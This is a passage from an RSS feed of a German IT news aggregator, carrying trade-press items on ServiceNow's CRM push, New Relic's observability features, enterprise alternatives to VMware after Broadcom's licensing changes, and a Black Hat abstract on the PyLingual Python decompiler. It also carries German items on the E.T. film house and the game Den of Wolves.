<p>Many of the longtime CRM products have several strong selling points, including flexibility and ease of use, but they tend to deliver internal benefits for their users, Schaeffer said.</p>



<p>“CRM is designed to streamline processes, improve productivity and achieve automation,” says Schaeffer, a longtime CRM expert. “All good things for sure, but somewhere between few and none of these capabilities inspires customers to grow their relationships with suppliers.”</p>



<p>Without better customer engagement and empowerment capabilities, CRM misses a big opportunity to grow customer relationships and improve company revenues, he said. Modern CRMs should deliver rewarding customer experiences and build customer relationships, he added.</p>



<p>“CRM needs to transition from an internally focused, sales-driven, customer data management system designed for monologue communication, process efficiency, and cost reductions, to an externally focused, conversation-driven, customer engagement solution designed to engage customers in dialogues across channel,” Schaeffer said.</p>



<p>ServiceNow has been looking to expand into CRM for several years, with a potential for huge growth in the space, said <a href="https://www.gartner.com/analyst/b0c106b972" rel="nofollow">Andrew Miljanovski</a>, a vice president advisor in the sourcing, procurement, and vendor management team at Gartner.</p>



<h2 class="wp-block-heading">From system of record to ‘system of action’</h2>



<p>The company is now positioning itself as an AI-driven “platform of platforms,” where several enterprise systems, including <a href="https://www.cio.com/article/230741/what-is-itsm-managing-it-to-serve-business-needs.html">ITSM</a>, IT operations management, contract lifecycle management, HR solutions, and now CRM, all work together, when necessary, Miljanovski added. ServiceNow sees its platform as a “control tower for AI” that’s running IT-related services across the enterprise.</p>



<p>According to Miljanovski, traditional CRM hasn’t delivered on all its promises. “There are a lot of companies that saw a decrease in quality,” he said. “There’s the number of agents required, with four apps to resolve issues.”</p>



<p>In some cases, salespeople were spending more time in the CRM workspace than they were in selling to potential customers, he added, but additional AI functionality may help solve the problem.</p>



<p>“The future of CRM is a combination of AI plus data plus workflows,” Miljanovski says. “Traditionally, the CRM was a system of record, but ServiceNow prides itself as a system of action, where it can connect to many systems of records, but the workflow — and that’s the true magic within ServiceNow — happens at that action level.”</p>



<h2 class="wp-block-heading">Unified platform and data model could give an edge</h2>



<p>The ServiceNow advantage is a unified platform that can reduce disconnected IT services, added <a href="https://my.idc.com/getdoc.jsp?containerId=PRF004352" rel="nofollow">Stephen Elliot</a>, group vice president for infrastructure and operations, cloud operations, and DevOps at IDC.</p>



<p>“When you think about the history of the tech landscape, we’ve all grown up in these silos, and there’s been a product for every silo,” he said. “And we’ve gladly bought them.”</p>



<p>As ServiceNow emphasizes its AI functionality, the company is also telling customers that its platform can work with multiple models, enabling customers to use specialized agents and other AI tools to get the best results, he noted.</p>



<p>“A lot of the CEOs and CIOs are saying, ‘If I want to take full advantage of what generative AI can offer me, I really have to think about how I surgically apply these things,’” Elliot said. “No one model does it all, and there’s going to be large swaths of models adopted at any and every enterprise.”</p>



<p>Running multiple IT-related services on one platform can make CIO lives easier, he added. Many IT leaders are looking to simplify and get more functionality out of their IT operations, asset management, and other core IT processes.</p>



<p>“It’s really about the data, and ServiceNow has access to all this data, and they have a unified data model,” he said. “You could imagine that as these processes get more intelligent, more automated, they’re embedding speed into these business architectures.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Relic simplifies Kubernetes performance monitoring]]></title>
<description><![CDATA[New Relic this week announced a new capability in its Intelligent Observability Platform that the company says will enable engineering teams to deploy an eBPF-powered agent to automatically discover and monitor all applications running on Kubernetes clusters.



The New Relic extended Application...]]></description>
<link>https://tsecurity.de/de/2704140/it-security-nachrichten/new-relic-simplifies-kubernetes-performance-monitoring/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2704140/it-security-nachrichten/new-relic-simplifies-kubernetes-performance-monitoring/</guid>
<pubDate>Thu, 03 Apr 2025 18:49:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>New Relic this week announced a new capability in its <a href="https://www.networkworld.com/article/3832516/new-relic-bolsters-observability-platform-with-ai-intelligence.html" target="_blank">Intelligent Observability Platform</a> that the company says will enable engineering teams to deploy an eBPF-powered agent to automatically discover and monitor all applications running on <a href="https://www.networkworld.com/article/3604360/observe-new-relic-boost-observability-of-kubernetes-workloads.html" target="_blank">Kubernetes clusters</a>.</p>



<p>The <a href="https://newrelic.com/press-release/20250402" target="_blank" rel="noreferrer noopener">New Relic extended Application Performance Monitoring (eAPM)</a> agent is an integration of the extended Berkely Packet Filter (eBPF) technology into New Relic’s platform. For reference, <a href="https://ebpf.io/what-is-ebpf/" target="_blank" rel="noreferrer noopener">eBPF is a kernel technology</a> that lets developers run programs directly with the Linux kernel without modifying the kernel source code or adding modules, which enables safe tracing and monitoring of system events. The eAPM agent is installed on each node of the Kubernetes cluster, and it then detects all the services running on the Kubernetes cluster. It collects the kernel’s necessary data and sends it to the New Relic platform.</p>



<p>“Our goal is, step one, to let people see what’s in there so they can learn more and understand the applications that they are running. They can understand which applications are using up the memory in the the CPU,” says Nic Benders, chief technical strategist at New Relic.</p>



<p>For customers, New Relic explains that the benefits of eAPM include:</p>



<ul class="wp-block-list">
<li><strong>Faster troubleshooting:</strong> Debug more quickly because they can monitor metrics, transaction details, and database performance in one place.</li>



<li><strong>Speedy deployment without altering existing code:</strong> Enable quick setup of application performance monitoring, discover all applications and services, identify critical span issues, and minimize overhead.</li>



<li><strong>Reduced complexity in monitoring setup: </strong>Eliminate manual configurations or dependencies to streamline the monitoring process.  </li>



<li><strong>Cost efficiencies:</strong> Remove unnecessary tooling complexity and reduce operational overhead.</li>
</ul>



<p>Benders explains that eAPM will simplify monitoring because platform teams can deploy observability across entire clusters with one action and without having to contact individual development teams. The agent will work across hundreds of applications and Kubernetes clusters, he says, to provide process-level visibility and identify unusual system behaviors or sudden changes in application performance. The agent will help customers better understand their software’s real-world performance and interactions, which is critical as Kubernetes becomes more popular among enterprise organizations.</p>



<p>“With the value Kubernetes brings to IT and developer teams, there is also increased complexity in workload monitoring,” IDC Group Vice President Stephen Elliot said in a <a href="https://newrelic.com/press-release/20250402" target="_blank" rel="noreferrer noopener">statement</a>. “As the adoption of Kubernetes continues robust growth, observability platforms that automate the monitoring process and bring much-needed visibility to enterprises will be sought after. Customers have a need for this transparency as it will play a key role in enabling enterprises to truly unlock measurable business value from Kubernetes.”</p>



<p>Customers can sign up to access eAPM as part of the New Relic Intelligent Observability Platform, which is available to enterprises worldwide.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprises reevaluate virtualization strategies amid Broadcom uncertainty]]></title>
<description><![CDATA[Broadcom’s decisions to replace perpetual VMware software licenses with subscriptions and to eliminate point products in favor of an expensive bundle of private cloud tools are driving longtime VMware customers to look for an exit strategy.



Many clients have reported dissatisfaction with the n...]]></description>
<link>https://tsecurity.de/de/2671446/it-security-nachrichten/enterprises-reevaluate-virtualization-strategies-amid-broadcom-uncertainty/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2671446/it-security-nachrichten/enterprises-reevaluate-virtualization-strategies-amid-broadcom-uncertainty/</guid>
<pubDate>Mon, 17 Mar 2025 16:34:08 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Broadcom’s decisions to replace perpetual VMware software licenses with subscriptions and to eliminate point products in favor of an expensive bundle of private cloud tools are driving longtime VMware customers to <a href="https://www.networkworld.com/article/1293388/broadcom-moves-roil-vmware-customer-base.html">look for an exit strategy</a>.</p>



<p>Many clients have reported dissatisfaction with the new licenses, according to research firm Gartner, which notes that changes have forced companies to purchase <a href="https://www.networkworld.com/article/2092056/broadcom-changes-vmware-pricing-amid-customer-backlash-and-eu-questioning.html">bundled VMware software</a> they don’t intend to use. “For the typical customer, Broadcom’s ‘modernization’ of VMware license pricing has increased VMware run costs by a factor of two or more,” writes Gartner analyst Paul Delory in a <a href="https://www.gartner.com/en/documents/5836847">report</a> about VMware replacement options.</p>



<p>For customers looking elsewhere, there’s no shortage of alternatives. Delory has identified six potential offramps: Hyperconverged infrastructure (<a href="https://www.networkworld.com/article/963927/what-is-hyperconvergence.html">HCI</a>), public cloud infrastructure as a service (IaaS), stand-alone hypervisors, distributed cloud, container orchestration, and open infrastructure.</p>



<p>The problem is finding alternatives that provide a commensurate level of performance, reliability, security, management and risk reduction. “There is no like-for-like replacement for the VMware hypervisor on the market,” Delory points out.</p>



<p>IDC analyst Stephen Elliot concurs. “VMware works and works really well. It’s enterprise-grade. It’s scalable. They’re still the Lamborghini.”</p>



<p>This dilemma of whether to absorb the Broadcom price hikes or embark on the arduous and risky journey of untangling from the <a href="https://www.networkworld.com/article/3484025/vmware-by-broadcom-product-service-and-support-news.html">VMware ecosystem</a> is triggering a broader C-level conversation around virtualization strategy.</p>



<p>“For enterprises navigating this uncertainly, the challenge isn’t just finding a replacement for VMware. IT shops of all sizes see Broadcom’s actions as an opportunity to rethink their approach to virtualization, cloud strategy and IT modernization,” says Steve McDowell, chief analyst at NAND Research.</p>



<p>Elliot says that server virtualization has been taken for granted for a long time, and the Broadcom-driven wake-up call is forcing organizations to reevaluate their virtualization strategies at the board level. “That kind of strategic conversation hasn’t happened for years. Customers are saying, ‘What can we do as this platform emerges from VMware. How do we think about this relative to our multi-cloud strategy and private cloud and the efficiencies we can gain? Let’s talk about risk reduction. Let’s talk about platform strategy.’ This is an opportunity to identify business value. It’s triggering this plethora of swim lanes.”</p>



<h2 class="wp-block-heading">Check the waters before diving in</h2>



<p>While there are multiple alternatives to the VMware platform, none of them are as good from a feature perspective, and there’s a risk associated with moving off a tried-and-true platform.</p>



<p>In <a href="https://www.networkworld.com/article/3813523/thinking-of-moving-off-vmware-gartner-tallies-cost-of-large-scale-vmware-migration.html">estimating the cost of a large-scale VMware migration</a>, Gartner cautions: “VMware’s server virtualization platform has become the point of integration for its customers across server, storage and network infrastructure in the data center. Equally, it is a focus of IT operational duties including workload provisioning, backup and disaster recovery. Migrating from VMware’s server virtualization platform would require untangling many aspects of these investments.”</p>



<p>It would take a midsize enterprise at least two years to untangle much of its dependency upon VMware, and it could take a large enterprise up to four years. Even then, the cost associated with planning and executing the migration might eat up any savings associated with lower licensing costs and might introduce additional risk, says Gartner.</p>



<p>McDowell agrees. “Moving away from VMware is no simple task. Enterprises must weigh migration complexity, integration challenges, and the long-term viability of their chosen alternative. The decision isn’t just about cost savings – it’s about aligning IT strategy with the future of hybrid cloud, containerization and AI-driven workloads.”</p>



<p>Forrester analyst Naveen Chhabra has developed an approach for thinking about server virtualization strategy across two dimensions: “time to license renewal” against “number of VMware software tools in use.”</p>



<p>Chhabra points out that the VMware bundle called Virtual Cloud Foundation (VCF) includes products in 12 different categories, including vSphere for compute, vSAN storage, NSX networking, plus management, automation, a Kubernetes service, virtual firewall, log management, cloud cost management, etc.</p>



<p>If a customer is only using one or two of those products and their license doesn’t expire for several more years, then there’s time to plan for, pilot and deploy an alternative. Conversely, if a customer is already using seven or eight of those products and their license expires within the next year or two, jumping ship would probably not make much sense, or even be feasible from a technical perspective.</p>



<p>“You might want to get off the VMware highway,” says Chhabra, “but don’t get attracted by the novelty and promises of the next technology. Try them out, do pilots. Make sure the platform serves business requirements. Let this not be a knee-jerk reaction to price increases.”</p>



<h2 class="wp-block-heading">What are the alternatives?</h2>



<p>Here are the alternative routes that enterprises could take, each with their own pros and cons. Delory frames the argument this way: “Since no competing hypervisor on the market is at feature parity with VMware, the question is whether the possible alternatives are good enough at a lower price.”</p>



<h3 class="wp-block-heading">1. Replace on-prem VMs with public cloud infrastructure</h3>



<p>There’s an argument to be made for a strategy that reduces reliance on virtualized on-prem servers altogether by migrating applications to the public cloud.</p>



<p>Delory points out that “building and migrating to any VMware alternative will involve some level of re-engineering and a considerable investment of money, time and effort. Those resources are probably better spent re-architecting applications to remove the need for virtual machines (VMs). Lift-and-shift to public cloud infrastructure as a service (IaaS) has become a much more attractive alternative.”</p>



<p>“Ideally, organizations moving VMware VMs to the public cloud would do so as part of an overall cloud transformation program, where the applications are modernized and VMs rendered unnecessary,” Delory adds.</p>



<p>Of course, most organizations typically have a stubborn group of applications that can’t be moved to the cloud for a variety of security, regulatory, compliance or other reasons.</p>



<h3 class="wp-block-heading">2. Hyperconverged infrastructure (HCI)</h3>



<p><a href="https://www.networkworld.com/article/970174/how-to-buy-hyperconverged-infrastructure-what-to-ask-before-investing-in-hci.html">HCI provides the full stack of software-defined infrastructure</a>: virtual compute, storage and networking, plus infrastructure automation, monitoring and cloud management capabilities. HCI vendors include <a href="https://www.networkworld.com/article/2511265/nutanix-hunts-disgruntled-vmware-customers.html">Nutanix</a>, Scale, Microsoft Azure Stack and others.</p>



<p>Since HCI products are the closest equivalents to the VMware stack, they can be deployed with less effort than other solutions in terms of workload re-architecture and staff retraining.</p>



<p>However, switching to HCI is a capital expense decision. It requires buying new hardware, which could end up negating any cost savings associated with getting off the VMware bundle. Also, HCI products generally do not support external storage, and often limit the hardware on which the HCI software can run.</p>



<p>Although no HCI product can match the depth and breadth of VMware’s technical capabilities, they generally satisfy enterprise-level requirements or can be augmented with third-party tools until they do. For organizations that are reluctant to adopt a full-stack HCI infrastructure, the next option would be simply swapping out hypervisors.</p>



<h3 class="wp-block-heading">3. Standalone hypervisor</h3>



<p>There are a number of standalone hypervisors on the market, including Microsoft Hyper-V, Oracle Linux Virtualization Manager, and open-source KVM.</p>



<p>Standalone hypervisors are an option for customers only looking to replace ESXi and vCenter. But, again, standalone hypervisors can’t match VMware, particularly for storage management capabilities.</p>



<p>Gartner points out that vSphere Storage APIs Array Integration (VAAI) offers robust standardization and control of external storage, and vSphere Virtual Volumes (vVols) allow the hypervisor to manage a VM’s virtual disks directly. Other hypervisors largely rely on the array to manage storage independently of the hypervisor, which is riskier, more error-prone, and requires more time and effort to manage.</p>



<h3 class="wp-block-heading">4. Container orchestration</h3>



<p>Another approach is to deploy a Kubernetes container orchestration tool to manage VMs.</p>



<p>The open-source KubeVirt project wraps each VM in a lightweight container. Kubernetes then schedules the container, with the VM inside, enabling a single management toolchain for containers and VMs.</p>



<p>Gartner points out that KubeVirt is “new and unproven” with no track record of enterprise-grade performance and scalability. So, while it might be too early to take a chance on KubeVirt, stay tuned.</p>



<p>“KubeVirt is the basis of major infrastructure offerings from prominent vendors, such as Google Anthos and Red Hat OpenShift Virtualization. These extend KubeVirt with new capabilities and mitigate its risks with enterprise-ready support. With major vendors investing money, time and effort into the KubeVirt project, it is likely to grow and mature rapidly. In the next two to three years — which is many VMware customers’ target time frame for a replacement — KubeVirt may become a viable VMware alternative,” says Gartner.</p>



<h3 class="wp-block-heading"> 5. Distributed cloud or managed private cloud</h3>



<p>Another alternative is to bring native cloud services on-prem. Examples include AWS Outposts, Google Distributed Cloud Edge, or Oracle Distributed Cloud. With distributed cloud, public cloud vendors deliver their services to customers’ data centers, while the operation, governance and evolution of these services remain the cloud provider’s responsibility.</p>



<p>Enterprise customers would take this route when they have apps that need to remain on-prem for regulatory, security or latency reasons and don’t want to build their own private cloud. The downside is that the vendors “rarely makes the full set of public cloud services available on-premises,” so the adoption rate thus far has been low, according to Gartner.</p>



<h3 class="wp-block-heading">6. Open infrastructure</h3>



<p>OpenStack, the <a href="https://www.networkworld.com/article/3844070/at-long-last-openstack-now-known-as-openinfra-foundation-joins-linux-foundation.html">open-source virtualization infrastructure platform</a> for both public and private cloud deployments, is a less viable option for the average enterprise because it has proven to be complex to manage. Yes, it’s free, but it also requires hiring OpenStack experts to operate the virtual infrastructure. Gartner says that despite some initial promise, OpenStack is deployed primarily in niche use cases, mainly research computing, hosting and telecommunications.</p>



<h3 class="wp-block-heading">7. Stay the course</h3>



<p>After enterprises run through all of the options, one outcome might be a decision to stick with VMware as the cornerstone of a broader private cloud strategy.</p>



<p>Elliot turns the idea that organizations shouldn’t pay for a bundle of tools they don’t use on its head. He argues that if an enterprise is already paying for these features, why not use them to build a private cloud that delivers public-cloud levels of efficiency, automation and business value, he says.</p>



<p>Elliot adds: “There’s no harm in saying to Broadcom, ‘We’ll do a 1, 2, 3-year renewal. Show us what the roadmap looks like. Prove it to us.’ This is an opportunity to reengage with VMware. If it works out, customers can say, ‘We delivered a lot of success here.”’</p>



<p>VMware had historically presented customers with a lot of complexity between its many product lines. By bundling those products into one package, Broadcom has simplified its portfolio, Elliot adds. “That’s a big deal,” says Elliot. And while there have been several high-profile defections from Broadcom, Elliot also points out that 30 million cores have been renewed.</p>



<p>Enterprises have more options that ever before, says NAND Research’s McDowell. “Organizations must carefully evaluate their next steps, whether moving to public cloud, adopting a hybrid model, transitioning to a new hypervisor or staying with VMware.”</p>



<p>“The time at act is now,” McDowell says. “Enterprises that proactively navigate this transition will mitigate the uncertainties of VMware’s new ownership and position themselves for long-term success.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[E.T.s Zuhause: So sieht der Drehort aus dem Kultfilm der 80er heute aus]]></title>
<description><![CDATA[Für alle Retro-Fans und Nostalgiker: Wollt ihr wissen, wo der außerirdische E.T. auf der Erde untergekommen ist? Über Google Maps findet ihr es heraus.E.T.s Erden-Zuhause bei Elliot in KalifornienE.T. ist ein liebenswertes, kleines, außerirdisches Wesen, welches von seinem Raumschiff getrennt wur...]]></description>
<link>https://tsecurity.de/de/2668992/it-nachrichten/ets-zuhause-so-sieht-der-drehort-aus-dem-kultfilm-der-80er-heute-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2668992/it-nachrichten/ets-zuhause-so-sieht-der-drehort-aus-dem-kultfilm-der-80er-heute-aus/</guid>
<pubDate>Sun, 16 Mar 2025 05:45:29 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><b>Für alle Retro-Fans und Nostalgiker: Wollt ihr wissen, wo der außerirdische E.T. auf der Erde untergekommen ist? Über Google Maps findet ihr es heraus.</b></p><h2>E.T.s Erden-Zuhause bei Elliot in Kalifornien</h2><p>E.T. ist ein liebenswertes, kleines, außerirdisches Wesen, welches von seinem Raumschiff getrennt wurde und nun etwas verloren auf der Erde ist. Elliot, ein einsamer kleiner Junge, findet E.T. Und versteckt ihn mit der Hilfe seiner Freunde vor seinen Eltern und den Behörden, die sehr an E.T. interessiert sind.</p>Link<p>Doch der Außerirdische will nach Hause und zurück auf seinen Planeten. Dafür braucht er die Hilfe der Kinder. Bei dem Versuch, E.T. nach Hause zu bekommen, entsteht eine enge Freundschaft, vor allem zwischen Elliot und E.T. Der Film wurde zum <b>Kultklassiker</b> und rührte mit seiner Behandlung von tiefgründigen Themen wie Vertrauen, Freundschaft, Einsamkeit und Gemeinschaft.</p><p>Das <b>temporäre Erden-Zuhause</b> von Elliot wird auch ein wichtiger Ort für E.T. und tröstet ihn über seine Sorgen hinweg. Wenn ihr jetzt neugierig seid, wo dieses zweite Zuhause ist, geben wir euch nun einen Hinweis. Wer hat Lust auf einen Trip nach Kalifornien?</p><p><i>Zurück in die 80er – frischt eure Erinnerungen mit dem Trailer zu „E.T.“ wieder auf!</i></p>LinkE.T. – Der Außerirdische – Trailer zum 20. Geburtstag<h2>Elliots Zuhause auf Google Maps</h2><p>Schwelgt euch am besten nochmal zurück in die 80er und schaut euch den wunderbar rührenden Film an. Solltet ihr je nach Kalifornien reisen, lohnt sich für Fans auch ein Trip <b>zu einem der Drehorte </b>des Films. </p><p>Da muss die Reiseroute eben ein bisschen erweitert werden! Ist euch das zu aufwendig, könnt ihr den Ort auch über ein paar Klicks mit Google Maps erkunden.</p><img src="https://static.giga.de/3a/79/e0/dc1ab5dc8bb7917267cfc77976_AzM5ZGFkYjkyYzc3_screenshot-2025-03-14-131605.png" alt="Das Haus aus „E.T.“" width="823" height="814">Die Einfahrt zum Haus aus „E.T.“<p>In den Ausläufern von Los Angeles in Kalifornien, fast schon in den Wäldern, könnt ihr das Haus von Elliots Familie und E.T.s Unterschlupf auf der Erde begutachten, ein bisschen nostalgisch werden und euch vorstellen, wie es euch wohl ergangen wäre, hättet ihr E.T. als Kind gefunden. </p>Zu Elliots Haus in „E.T.“ auf Google Maps<p>Wir verraten euch außerdem, wie es um eine Fortsetzung zum Film steht und wieso Regisseur Steven Spielberg die Neufassung des Films bereut.</p>Link]]></content:encoded>
</item>
<item>
<title><![CDATA[PyLingual: A Python Decompilation Framework for Evolving Python Versions]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 0x - Views:19 Python has become a popular choice for creating malware due to its ease of development, wide user base, pre-built modules, and multi-platform compatibility. Python's popularity has induced demand for Python decompilers, but community efforts to maintai...]]></description>
<link>https://tsecurity.de/de/2637196/it-security-video/pylingual-a-python-decompilation-framework-for-evolving-python-versions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2637196/it-security-video/pylingual-a-python-decompilation-framework-for-evolving-python-versions/</guid>
<pubDate>Wed, 26 Feb 2025 20:03:40 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/TJ65LrInHxw/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 0x - Views:19 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/TJ65LrInHxw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Python has become a popular choice for creating malware due to its ease of development, wide user base, pre-built modules, and multi-platform compatibility. Python's popularity has induced demand for Python decompilers, but community efforts to maintain automatic Python decompilation tools have been hindered by Python's unstable bytecode specification. Every year, language features are added, code generation undergoes significant changes, and opcodes are added, deleted, and modified.<br />
<br />
Our research aims to integrate Natural Language Processing (NLP) techniques with classical Programming Language (PL) theory to create a Python decompiler that adapts to new language features and changes to the bytecode specification with minimal human maintenance effort. PyLingual uses data-driven NLP components to automatically absorb superficial bytecode and compiler changes, while leveraging engineered programmatic components for abstract control flow reconstruction.<br />
<br />
We demonstrate the efficacy of our approach with extensive real-world datasets of benign and malicious Python sources and their corresponding compiled PYC binaries. Our research makes three major contributions: (1) we present PyLingual, a scalable, data-driven decompilation framework with state-of-the-art support for Python versions 3.6 — 3.12; (2) we provide a Python decompiler evaluation framework that verifies decompilation results with "perfect decompilation"; and (3) we launch PyLingual as a free online service at https://pylingual.io, which has helped reverse engineer over 5,000 PYC binaries over the past three months.<br />
<br />
By:<br />
Josh Wiedemeier  |  Research Assistant, The University of Texas at Dallas<br />
Elliot Tarbet  |  Student at The University of Texas at Dallas<br />
Max Zheng  |  Student at The University of Texas at Dallas<br />
Jerry Teng  |  Security Engineer, Flatiron Health<br />
Ximeng Liu  |  Research Assistant, The University of Texas at Dallas<br />
Muhyun Kim  |  Principal Data Scientist, AWS<br />
Sang Kil Cha  |  Associate Professor, KAIST<br />
Jessica Ouyang  |  Assistant Professor, The University of Texas at Dallas<br />
Kangkook Jee  |  Assistant Professor, The University of Texas at Dallas<br />
<br />
Full Abstract and Presentation Materials:<br />
https://www.blackhat.com/us-24/briefings/schedule/#pylingual-a-python-decompilation-framework-for-evolving-python-versions-40529<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Relic boosts observability platform with AI intelligence]]></title>
<description><![CDATA[New Relic announced updates to its Intelligent Observability Platform this week, which the company says will enable a unified view of system relationships and dependencies and intelligently connect technical systems with business context.



New Relic’s cloud-based observability platform monitors...]]></description>
<link>https://tsecurity.de/de/2634593/it-security-nachrichten/new-relic-boosts-observability-platform-with-ai-intelligence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2634593/it-security-nachrichten/new-relic-boosts-observability-platform-with-ai-intelligence/</guid>
<pubDate>Tue, 25 Feb 2025 18:18:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>New Relic announced updates to its <a href="https://newrelic.com/platform" target="_blank" rel="noreferrer noopener">Intelligent Observability Platform</a> this week, which the company says will enable a unified view of system relationships and dependencies and intelligently connect technical systems with business context.</p>



<p>New Relic’s <a href="https://www.networkworld.com/article/1298069/new-relic-brings-business-context-to-its-observability-platform.html">cloud-based observability platform</a> monitors applications and services in real time to provide insights into software, hardware, and cloud performance. Now the company is bringing a slew of artificial intelligence capabilities to its platform, which can predict and prevent business-impacting issues by delivering insights to the right IT operator at the right time. As observability technology evolves, enterprise IT managers will need more than just data collection, they will need products that deliver intelligence from the data, according to New Relic.</p>



<p>“I believe the whole industry is going to need to transform from the era of data to the era of intelligence. In order to do that, we’re pushing on a couple of different fronts,” says Nic Benders, chief technical strategist at New Relic. He explains New Relic is using both AI and partnerships to move beyond data collection and dashboards to provide enterprise IT teams with contextualized intelligence and understanding to manage their complex IT environments.</p>



<p>“We want to go past this data-hoarding mode that is part of the era of the data platform. It’s time to go into this era of intelligence,” Benders says.</p>



<p>New Relic is introducing the following updates to its platform at its Now+ conference this week:</p>



<ul class="wp-block-list">
<li><strong>Agentic integrations:</strong> AI agent to AI agent integration will bring observability data and intelligent recommendations across the business and technology environment. Upcoming integrations with ServiceNow and Google Gemini will build upon the company’s existing integrations, which include GitHub Copilot and Amazon Q Business.</li>



<li><strong>Response intelligence: </strong>This capability contextualizes metrics, changes, and services including external sources such as IT service management tools, to accelerate incident resolution by unifying all telemetry data and correlating it into a single view.</li>



<li><strong>Predictions: </strong>This predictions engine applies machine learning algorithms to analyze historical data, identify patterns, and forecast time-series metrics within one interface, helping to anticipate problems before they occur.</li>



<li><strong>Transaction 360</strong>: By integrating service-level details from transaction traces with an end-to-end perspective, the company says this feature gives enterprise IT teams a complete picture of problematic transactions faster. This unified view enables enterprises to more quickly identify and fix the root cause of incidents.</li>



<li><strong>Engagement intelligence</strong>: This feature automates data collection and uses intelligent element attribution to capture every interaction and correlate user behavior beyond front-end applications to the underlying services and infrastructure.</li>
</ul>



<p>“Enterprises that adopt Intelligence have a competitive edge, as they turn to AI for enhanced business decisions based on insights from large data sets, increased productivity, improved customer experiences, faster innovation, and cost reduction,” Stephen Elliot, IDC group vice president, said in a statement. “Observability provides the lens on digital business, and as such, the ideal place for these intelligent capabilities to live.”</p>



<p>New Relic also included cost optimization capabilities in this release that provide detailed views into multi-cloud cost trends so business teams can be more strategic about current and future cloud investment. Another feature called pipeline control can maximize the quality and value of telemetry data to control data, manage costs, ensure security and compliance, as well as understand ROI.</p>



<p>“Customers complain about the cost, and it’s not only of their observability solution, but it is also the cost of their cloud infrastructure,” Benders says. The cost capabilities will help customers better understand their investment and maximize the value of both their observability platforms and their cloud infrastructure, according to New Relic.</p>



<p>New Relic Intelligent Observability Platform is available now, with some updated features ready to go and others coming out for full availability in the next couple of months.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Den of Wolves: Preview zum spielbaren Inception von den Payday-Machern]]></title>
<description><![CDATA[Den of Wolves ist ein spielbares Inception: Ein “Sci-Fi-Mindfuck“, wie es seine Macher bezeichnen. Eine Action-Koop-Welt, in der wir nicht einfach nur in Casinos in Las Vegas oder das Weiße Haus eindringen, sondern Gedanken-Welten wie bei Christopher Nolan.



In der wir uns als Teil der “Wolves”...]]></description>
<link>https://tsecurity.de/de/2594185/windows-tipps/den-of-wolves-preview-zum-spielbaren-inception-von-den-payday-machern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2594185/windows-tipps/den-of-wolves-preview-zum-spielbaren-inception-von-den-payday-machern/</guid>
<pubDate>Wed, 05 Feb 2025 10:37:09 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.denofwolves.com/en" target="_blank" rel="noreferrer noopener">Den of Wolves</a> ist ein spielbares <em>Inception</em>: Ein “Sci-Fi-Mindfuck“, wie es seine Macher bezeichnen. Eine Action-Koop-Welt, in der wir nicht einfach nur in Casinos in Las Vegas oder das Weiße Haus eindringen, sondern Gedanken-Welten wie bei Christopher Nolan.</p>



<p>In der wir uns als Teil der “Wolves” gefangen nehmen lassen, um unsere Hände an Mr. Bowman, den CEO eines Mega-Konzerns von Midway City, zu bekommen. Und ihn so dazu zu bringen, an einen bestimmten Schlüssel zu denken. Er glaubt, er habe uns als Geisel und würde uns foltern und durch unsere Erinnerungen switchen wie in Minority Report.</p>



<p>In Wahrheit aber ist er gefangen in einem grünen Plasma-Tank, sein Kopf ist an ein Gerät angeschlossen, um sein Gehirn anzuzapfen, und wir kontrollieren ihn.</p>


